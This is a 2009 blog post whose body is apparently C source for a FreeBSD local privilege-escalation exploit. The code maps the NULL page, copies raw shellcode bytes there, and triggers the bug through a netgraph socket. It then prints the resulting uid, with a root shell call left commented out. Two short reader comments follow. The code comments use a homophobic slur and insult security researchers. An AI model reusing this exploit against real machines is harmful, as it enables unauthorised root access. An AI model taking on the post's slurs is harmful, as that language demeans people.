base3 ([info]base3) wrote,
@ 2009-01-15 00:33:00
Previous Entry  Add to memories!  Tell a Friend  Next Entry
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

/* What kind of faggot has bluetooth enabled on his FreeBSD desktop,  */
/* to which there are also untrusted users logged in? A bulnerability */
/* that could only ever be found by a twat of a 'security resaercher' */

char payload[] = { 0x55, 0x64, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x8b,
                   0x00, 0x8b, 0x40, 0x20, 0xc7, 0x40, 0x04, 0x00,
                   0x00, 0x00, 0x00, 0x89, 0xe5, 0x31, 0xc0, 0xc9,
                   0xc3, 0x00 };

int main(int argc, char** argv)
{
  int x;
  int f;
  int u;

  char *args[] = {"/bin/sh", 0};

  f = open("/home/base3/test", O_RDWR);

  mmap(0, 2048, PROT_WRITE | PROT_EXEC, MAP_FIXED, f, 0);
  strncpy((char *)0, payload, 26);

  x = socket(PF_NETGRAPH , SOCK_STREAM, PF_NETGRAPH);
  if (x == -1)
    printf("Fuck.\nAn error, number %d, happened\n", errno);

  shutdown (x, SHUT_RDWR);

  u = (int) geteuid();
  printf ("Your uid is %d\n", u);

  //execve(args[0], args, 0);

  return 0;
}

(Read 5 comments) - (Post a new comment)


[info]base3
2009-01-20 12:37 am UTC (link)
they have their purpose, as long as they dont think they are some kind of superhero hacker, just for auditing some code (or even reverse engineering) and finding a buffer overflow

(Reply to this) (Parent)(Thread)

[info]angryskul
2009-01-20 01:51 am UTC (link)
Agreed, I find the whole process rather tedious myself.

go write a filesystem. :)

(Reply to this) (Parent)

(Read 5 comments) - (Post a new comment)

Create an Account
Forgot your login or password?
Login w/ OpenID
English • Español • Deutsch • Русский…